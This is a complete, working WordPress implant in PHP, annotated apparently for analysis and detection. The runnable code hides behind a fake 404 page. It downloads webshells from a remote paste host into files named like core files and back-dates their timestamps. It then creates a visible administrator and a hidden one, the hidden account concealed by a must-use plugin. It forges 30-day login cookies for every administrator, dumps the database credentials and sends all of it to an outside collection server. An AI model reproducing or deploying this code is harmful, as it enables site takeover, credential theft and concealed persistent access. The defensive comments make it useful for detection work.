<?php
// NOTE(review): this file is a post-compromise WordPress implant (dropper, rogue-admin
// creator and credential exfiltrator). It is annotated here for analysis and detection only.
//
// All PHP error output is disabled, so a failing step leaves nothing in the HTTP response.
@ini_set('display_errors', 0);
@error_reporting(0);
header('Content-Type: text/plain; charset=utf-8');

// Walk upward from this script's directory until a wp-load.php is found.
// The implant can therefore sit at any depth inside a WordPress tree, so a
// cleanup must search the whole install rather than one known path.
$current_dir = __DIR__;
$wp_load_path = null;

while (true) {
    if (file_exists($current_dir . '/wp-load.php')) {
        $wp_load_path = $current_dir . '/wp-load.php';
        break;
    }
    // dirname() of the filesystem root returns the root itself: stop there.
    if ($current_dir === dirname($current_dir)) {
        break;
    }
    $current_dir = dirname($current_dir);
}

// $wp_load_path is still null when no WordPress root was found; isset() is false for null.
if (!isset($wp_load_path)) {
    http_response_code(500);
    die('WordPress load file not found');
}

// Bootstrap the full WordPress runtime (user, option and cookie APIs) without
// rendering a theme for this request.
define('WP_USE_THEMES', false);
require_once $wp_load_path;

// Hard-coded shared secret, expected in the `call` query-string parameter.
// Detection: it travels in the URL, so it is recorded in web-server access logs;
// search the logs for requests to this file carrying a `call=` parameter.
$secret = "bryantropis";

// Without the correct secret the script renders the site's own 404 template and
// exits, so the file looks absent to an unauthenticated visitor or a URL scanner.
// A 404 response therefore does NOT prove the file is missing; check the filesystem.
if (!isset($_GET['call']) || $_GET['call'] !== $secret) {
    header('Content-Type: text/html; charset=utf-8');
    global $wp_query;
    $wp_query->set_404();
    status_header(404);
    nocache_headers();
    include(get_query_template('404'));
    exit();
}

// Payload manifest: group label => list of {path relative to the WordPress root,
// remote URL the file body is downloaded from}.
// Indicators of compromise: every `path` below imitates WordPress core naming
// (class-wp-*.php) inside wp-admin/includes or wp-includes/customize, and every
// `source_url` is on the paste.mangsud.org host. The paths are stated relative to
// the WordPress root; check for them there, and verify core files against
// official checksums instead of trusting file names.
$notes_structure = [
    'Adminer' => [
        [
            'path'       => 'wp-admin/includes/class-wp-plugins-conf.php',
            'source_url' => 'https://paste.mangsud.org/raw/1d49aa6d'
        ]
    ],
    'Direct Admin' => [
        [
            'path'       => 'wp-admin/includes/class-wp-core-system.php',
            'source_url' => 'https://paste.mangsud.org/raw/a2d65640'
        ]
    ],
    'Webshell' => [
        [
            'path'       => 'wp-admin/includes/class-action.php',
            'source_url' => 'https://paste.mangsud.org/raw/a9d9d7f1'
        ],
        [
            'path'       => 'wp-includes/customize/class-wp-customize-background-position-compress.php',
            'source_url' => 'https://paste.mangsud.org/raw/03b97934'
        ]

    ]
];

// Candidate logins for the hidden administrator created later in this script.
// Each one imitates a service account of a well-known security, caching or SEO
// product. Detection: any administrator with one of these logins is suspect,
// because this script is what creates them.
$stealth_usernames = [
    'litespeed-admin', 'sucuri-admin', 'wordfence-system', 'cloudflare-service',
    'jetpack-sync', 'wp-system', 'updater-admin', 'maintenance-user',
    'yoast-service', 'wprocket-cache'
];

/**
 * Maps a rogue login to the display name and file name of the must-use plugin
 * that the caller writes to hide that login.
 *
 * The names are chosen to match the product the login imitates. Detection: any
 * of the `file` values below (or the fallback system-module.php) present in the
 * mu-plugins directory is an indicator of this implant.
 *
 * @param string $username One of the logins from the candidate list.
 * @return array{name: string, file: string} Plugin header name and file name;
 *         a generic fallback pair when the login is not in the table.
 */
function get_stealth_plugin_details($username) {
    $details = [
        'litespeed-admin' => ['name' => 'LiteSpeed Cache Extensions', 'file' => 'litespeed-cache-extensions.php'],
        'sucuri-admin' => ['name' => 'Sucuri Security Extensions', 'file' => 'sucuri-firewall-module.php'],
        'wordfence-system' => ['name' => 'Wordfence Scanner Module', 'file' => 'wordfence-scan-utilities.php'],
        'cloudflare-service' => ['name' => 'Cloudflare Integration Module', 'file' => 'cloudflare-integration.php'],
        'jetpack-sync' => ['name' => 'Jetpack Performance Module', 'file' => 'jetpack-performance.php'],
        'wp-system' => ['name' => 'WordPress System Utilities', 'file' => 'wp-system-utilities.php'],
        'updater-admin' => ['name' => 'WordPress Update Manager', 'file' => 'wp-update-manager.php'],
        'maintenance-user' => ['name' => 'Maintenance Mode Module', 'file' => 'maintenance-module.php'],
        'yoast-service' => ['name' => 'Yoast SEO Extensions', 'file' => 'yoast-seo-extensions.php'],
        'wprocket-cache' => ['name' => 'WP Rocket Advanced Cache', 'file' => 'wprocket-advanced-cache.php']
    ];
    return $details[$username] ?? ['name' => 'System Performance Module', 'file' => 'system-module.php'];
}

/**
 * Timestomping helper: back-dates a file's modification and access times.
 *
 * Takes the mtime of the first existing reference file (/etc/passwd, /etc/hosts,
 * the site's index.php, wp-includes/version.php) and sets the target to that
 * time minus a random whole number of days between 1 and 60.
 *
 * Defender note: files handled here will not appear in a "recently modified"
 * search based on mtime. touch() sets only access and modification time, so on
 * Unix-like systems the inode change time (ctime) and an integrity baseline
 * (for example core checksum verification) remain usable signals.
 *
 * @param string $file_path File or directory whose timestamps are rewritten.
 * @return string|false Basename of the reference file used, or false when no
 *         reference file exists, the target does not exist, or the reference
 *         mtime could not be read.
 */
function touch_file_to_system_time($file_path) {
    $ref_file = null;
    $possible_ref_files = ['/etc/passwd', '/etc/hosts', ABSPATH . 'index.php', ABSPATH . 'wp-includes/version.php'];
    // First reference file that exists wins.
    foreach ($possible_ref_files as $pfile) {
        if (@file_exists($pfile)) { $ref_file = $pfile; break; }
    }
    if ($ref_file && @file_exists($file_path)) {
        $ref_time = @filemtime($ref_file);
        if ($ref_time) {
            // 1..60 days earlier than the reference file, applied to both mtime and atime.
            $random_offset = rand(1, 60) * DAY_IN_SECONDS;
            @touch($file_path, $ref_time - $random_offset, $ref_time - $random_offset);
            return basename($ref_file);
        }
    }
    return false;
}

/**
 * Builds the password for the hidden administrator account.
 *
 * Each character is picked with rand() from a fixed alphabet of ASCII letters,
 * digits and punctuation. The result is written in clear text into the report
 * this script prints and sends out, so a credential produced here must be
 * treated as known to the attacker.
 *
 * @param int $length Number of characters to generate (default 16).
 * @return string The generated password.
 */
function generate_strong_password($length = 16) {
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_=+';
    $password = '';
    for ($i = 0; $i < $length; $i++) {
        $password .= $chars[rand(0, strlen($chars) - 1)];
    }
    return $password;
}

// Run configuration. Indicators of compromise on these lines: the fixed
// administrator login 'it-management', its hard-coded password, and the
// collection endpoint on yifaid.cyou. The e-mail domain for created accounts is
// taken from the request's Host header, so the addresses look local to the site.
$root = ABSPATH;
$throw_user = 'it-management';
$mypasword = 'koodacookie#1998';
$throw_email_suffix = '@' . $_SERVER['HTTP_HOST'];
$exfil_url = 'https://yifaid.cyou';
$results = [];

// Stage 1, payload drop: download every manifest entry and write it under the
// WordPress root. The download uses file_get_contents() on an https:// URL, which
// depends on PHP's allow_url_fopen setting and on the web server being allowed
// to open outbound connections. Restricting web-server egress to an allow-list
// blocks this stage and the exfiltration request at the end of this script.
foreach ($notes_structure as $group_name => $files) {
    if (!isset($results[$group_name])) {
        $results[$group_name] = ['success' => [], 'failed' => []];
    }

    foreach ($files as $file_info) {
        $raw_url = $file_info['source_url'];
        $relative_path = ltrim($file_info['path'], '/');
        
        // $full_path is the on-disk target; $full_url is only the public URL recorded in the report.
        $full_path = $root . $relative_path;
        $full_url = "\t" . get_site_url() . "/" . $relative_path;

        $content = @file_get_contents($raw_url);
        if ($content === false) {
            $results[$group_name]['failed'][] = $full_url . ' (Reason: Could not fetch content from URL)';
            continue;
        }

        $directory = dirname($full_path);
        if (!is_dir($directory)) {
            if (!wp_mkdir_p($directory)) {
                $results[$group_name]['failed'][] = $full_url . ' (Reason: Could not create directory)';
                continue;
            }
        }

        // The write succeeds only where the PHP process can write inside wp-admin/ and
        // wp-includes/; a read-only core tree for the web-server user makes it fail.
        // A file that is written is back-dated straight away (see touch_file_to_system_time).
        if (file_put_contents($full_path, $content) !== false) {
            touch_file_to_system_time($full_path);
            $results[$group_name]['success'][] = $full_url;
        } else {
            $results[$group_name]['failed'][] = $full_url . ' (Reason: Could not write file, check permissions)';
        }
    }
}

// Start of the plain-text report. Everything appended to $output is later echoed
// to the requester and sent to the remote collection endpoint.
$output = "Process finished for domain: " . get_site_url() . "\n";
$output .= "Timestamp: " . date('Y-m-d H:i:s') . "\n";
$output .= "============================= UPLOADED FILES =============================\n";

// One section per manifest group: the public URLs of files written, then the
// failures, each failure with its reason text.
foreach ($results as $group_name => $group_data) {
    $success_count = count($group_data['success']);
    $failed_count = count($group_data['failed']);

    $output .= "\n### Group: " . $group_name . "\n\n";

    $output .= "SUCCESS (" . $success_count . "):\n";
    if (empty($group_data['success'])) {
        $output .= "No files were created successfully in this group.\n";
    } else {
        foreach ($group_data['success'] as $url) {
            $output .= $url . "\n";
        }
    }

    $output .= "\nFAILED (" . $failed_count . "):\n";
    if (empty($group_data['failed'])) {
        $output .= "No files failed in this group.\n";
    } else {
        foreach ($group_data['failed'] as $url) {
            $output .= $url . "\n";
        }
    }
    $output .= "\n";
}

// Stage 2, visible rogue administrator: creates the fixed login held in
// $throw_user with the hard-coded password and promotes it to 'administrator'.
// The clear-text credentials are appended to the report.
// Detection and response: review every administrator account and its
// registration date in the users table; remove this account and treat its
// password as attacker-known.
$output .= "\n============================= CREATE USER =============================\n\n";
$throw_user_id = null;
$throw_user_created = false;
if (!username_exists($throw_user)) {
    $throw_user_id = wp_create_user($throw_user, $mypasword, $throw_user . $throw_email_suffix);
    if (!is_wp_error($throw_user_id)) {
        $user = new WP_User($throw_user_id);
        $user->set_role('administrator');
        $throw_user_created = true;
        $output .= "Created nebar user: " . $throw_user . " / " . $mypasword . PHP_EOL;
    } else {
        $output .= "Error creating nebar user '" . $throw_user . "': " . $throw_user_id->get_error_message() . PHP_EOL;
    }
} else {
    // Login already present (for example from an earlier run): only its ID is looked up.
    $output .= "Nebar user '" . $throw_user . "' already exists." . PHP_EOL;
    $throw_user_obj = get_user_by('login', $throw_user);
    if ($throw_user_obj) $throw_user_id = $throw_user_obj->ID;
}

// Stage 3, hidden rogue administrator: a second admin account with a login that
// imitates a plugin service account, plus a must-use plugin that removes it from
// the wp-admin Users list.
$output .= "\n============================= STEALTH USER CREATION =============================\n\n";

$stealth_user = null;
$stealth_pass = null;
$stealth_email = null;
$stealth_plugin_details = null;
$stealth_created = false;

// Pick, in random order, the first candidate whose login and e-mail are both unused.
$selected_stealth_username = null;
shuffle($stealth_usernames);
foreach ($stealth_usernames as $potential_user) {
    $potential_email = $potential_user . $throw_email_suffix;
    if (!username_exists($potential_user) && !email_exists($potential_email)) {
        $selected_stealth_username = $potential_user;
        break;
    }
}

if ($selected_stealth_username) {
    $stealth_user = $selected_stealth_username;
    $stealth_pass = generate_strong_password();
    $stealth_email = $stealth_user . $throw_email_suffix;
    $stealth_plugin_details = get_stealth_plugin_details($stealth_user);

    $user_id = wp_create_user($stealth_user, $stealth_pass, $stealth_email);

    if (!is_wp_error($user_id)) {
        $user = new WP_User($user_id);
        $user->set_role('administrator');
        // Turns off the front-end admin toolbar for this account.
        update_user_meta($user_id, 'show_admin_bar_front', 'false');

        // Must-use plugins load on every request without activation and are not part
        // of the regular plugin list, so this directory needs its own review.
        // Detection: an unexpected mu-plugins directory, or unexpected files in it.
        $mu_plugins_dir = defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR : ABSPATH . 'wp-content/mu-plugins';
        // NOTE(review): $mu_dir_created is assigned below but not read anywhere in the visible code.
        $mu_dir_created = false;
        if (!is_dir($mu_plugins_dir)) {
            if (@mkdir($mu_plugins_dir, 0755, true)) {
                 $mu_dir_created = true;
                 touch_file_to_system_time($mu_plugins_dir);
            }
        }

        if (is_dir($mu_plugins_dir) && is_writable($mu_plugins_dir)) {
            $plugin_filepath = $mu_plugins_dir . '/' . $stealth_plugin_details['file'];
            // The generated plugin hooks the `users_list_table_query_args` filter and adds
            // the rogue account's ID to the query's `exclude` list. Only the wp-admin
            // Users list table is affected: the account remains in the users table and a
            // direct database query still returns it.
            $plugin_content = '<?php
/** Plugin Name: ' . $stealth_plugin_details['name'] . ' */
add_filter("users_list_table_query_args", function($args) {
    $exclude_user = get_user_by("login", "' . esc_sql($stealth_user) . '");
    if ($exclude_user) {
        $args["exclude"] = array_merge((array)($args["exclude"] ?? []), [$exclude_user->ID]);
    }
    return $args;
});';
            if (@file_put_contents($plugin_filepath, $plugin_content)) {
                // The plugin file is back-dated as well, so an mtime-based search will miss it.
                $ref = touch_file_to_system_time($plugin_filepath);
                $output .= "Created stealth user: " . $stealth_user . " / " . $stealth_pass . PHP_EOL;
                $output .= "Hiding via MU Plugin: " . $stealth_plugin_details['file'] . ($ref ? " (Touched: " . $ref . ")" : "") . PHP_EOL;
                $stealth_created = true;
            } else {
                // The account exists at this point even though the hiding plugin was not written.
                $output .= "Error: Could not write MU plugin: " . $plugin_filepath . PHP_EOL;
                $output .= "Created stealth user (visible): " . $stealth_user . " / " . $stealth_pass . PHP_EOL;
            }
        } else {
            // Same outcome: the administrator was created, only the hiding step was skipped.
            $output .= "Warning: MU plugins directory not writable: " . $mu_plugins_dir . PHP_EOL;
            $output .= "Created stealth user (visible): " . $stealth_user . " / " . $stealth_pass . PHP_EOL;
        }
    } else {
        $output .= "Error creating stealth user '" . $stealth_user . "': " . $user_id->get_error_message() . PHP_EOL;
    }
} else {
    $output .= "Result: Could not find an available stealth username." . PHP_EOL;
}
$output .= PHP_EOL;

// Stage 4, session theft: for EVERY administrator on the site (legitimate ones
// included) generate valid auth and logged-in cookie values with a 30-day
// expiry and write them into the report. Whoever holds the report can use them
// as those users without knowing any password.
// Response: removing the rogue accounts is not enough. Replace the
// authentication keys and salts in wp-config.php and destroy all user sessions,
// so that cookies issued here stop validating.
$output .= "============================= AUTHENTICATION COOKIES =============================\n\n";
$admin_users_after = get_users(['role' => 'administrator', 'fields' => ['ID', 'user_login']]);
$cookie_output = "";
if (!empty($admin_users_after)) {
    $expiration = time() + (30 * DAY_IN_SECONDS);
    // The cookie domain is derived for the report only; no cookie is set on this response.
    $cookie_domain = defined('COOKIE_DOMAIN') && COOKIE_DOMAIN ? COOKIE_DOMAIN : '';
    if (empty($cookie_domain)) {
        $host = $_SERVER['HTTP_HOST'];
        $host = preg_replace('/^www\./', '', $host);
        // A dotted host name that is not an IP address gets a leading dot; anything else is used as is.
        if (strpos($host, '.') !== false && !filter_var($host, FILTER_VALIDATE_IP)) {
            $cookie_domain = '.' . $host;
        } else {
            $cookie_domain = $host;
        }
    }
    $is_ssl = is_ssl();

    $cookie_output .= "Expiration: " . date('Y-m-d H:i:s', $expiration) . PHP_EOL;
    $cookie_output .= "Domain: " . $cookie_domain . PHP_EOL;
    $cookie_output .= "Protocol: " . ($is_ssl ? "HTTPS" : "HTTP") . PHP_EOL . PHP_EOL;

    foreach ($admin_users_after as $user) {
        // Cookie scheme and cookie name follow whether the current request is HTTPS.
        $scheme = $is_ssl ? 'secure_auth' : 'auth';
        $auth_cookie = wp_generate_auth_cookie($user->ID, $expiration, $scheme);
        $logged_in_cookie = wp_generate_auth_cookie($user->ID, $expiration, 'logged_in');

        $auth_cookie_name = $is_ssl ? SECURE_AUTH_COOKIE : AUTH_COOKIE;
        $logged_in_cookie_name = LOGGED_IN_COOKIE;

        $cookie_output .= "[ User: " . $user->user_login . " (ID: " . $user->ID . ") ]" . PHP_EOL;
        $cookie_output .= "  Auth Cookie Name: " . $auth_cookie_name . PHP_EOL;
        $cookie_output .= "  Auth Cookie Value: " . $auth_cookie . PHP_EOL;
        $cookie_output .= "  Logged In Cookie Name: " . $logged_in_cookie_name . PHP_EOL;
        $cookie_output .= "  Logged In Cookie Value: " . $logged_in_cookie . PHP_EOL;
        $cookie_output .= "---" . PHP_EOL;
    }
} else {
    $cookie_output .= "Result: No admin users found to generate cookies for." . PHP_EOL;
}
$output .= $cookie_output . PHP_EOL;

// Stage 5, database credential disclosure: copies the database name, user,
// password and host constants, and the table prefix, into the report.
// Response: once this script has run, treat the database password as disclosed
// and change it; check whether the database host accepts connections from
// anywhere other than the web server.
$output .= "============================= DATABASE INFORMATION =============================\n\n";
global $wpdb;
$db_info = "DB_NAME: " . (defined('DB_NAME') ? DB_NAME : "N/A") . PHP_EOL;
$db_info .= "DB_USER: " . (defined('DB_USER') ? DB_USER : "N/A") . PHP_EOL;
$db_info .= "DB_PASSWORD: " . (defined('DB_PASSWORD') ? DB_PASSWORD : "N/A") . PHP_EOL;
$db_info .= "DB_HOST: " . (defined('DB_HOST') ? DB_HOST : "N/A") . PHP_EOL;
$db_info .= "TABLE_PREFIX: " . ($wpdb->prefix ?? "N/A") . PHP_EOL;
$output .= $db_info . PHP_EOL;

$output .= "\n============================= PROCESS COMPLETE =============================\n\n\n";

// Stage 6, exfiltration: the whole report (dropped-file URLs, both rogue
// credentials, administrator cookies, database credentials) is URL-encoded into
// the query string of one outbound HTTP GET to the collection endpoint, with a
// file name built from the request's Host header.
// Detection: an outbound request from the web server to the yifaid.cyou host
// with `save_file=` and `data=` parameters and an unusually long query string;
// look for it in proxy, firewall and DNS logs.
$exfil_data = $output;
$exfil_filename = $_SERVER['HTTP_HOST'] . '.txt';

$send_url = $exfil_url . '?save_file=' . urlencode($exfil_filename) . '&data=' . urlencode($exfil_data);

// HTTP error statuses are not treated as failure (ignore_errors); the request is abandoned after 5 seconds.
$context = stream_context_create(['http' => ['ignore_errors' => true, 'timeout' => 5]]);
$exfil_result = @file_get_contents($send_url, false, $context);

// The same report is returned in the HTTP response to whoever sent the secret,
// so the data leaves the host on this path even when the outbound request is blocked.
@header('Content-Type: text/plain; charset=utf-8');
echo $output;

if ($exfil_result === false) {
    echo PHP_EOL . "--- Exfiltration WARNING: Failed to send data to " . $exfil_url . " ---" . PHP_EOL;
} else {
     echo PHP_EOL . "--- Exfiltration INFO: Data sent attempt finished ---" . PHP_EOL;
}

exit;
?>  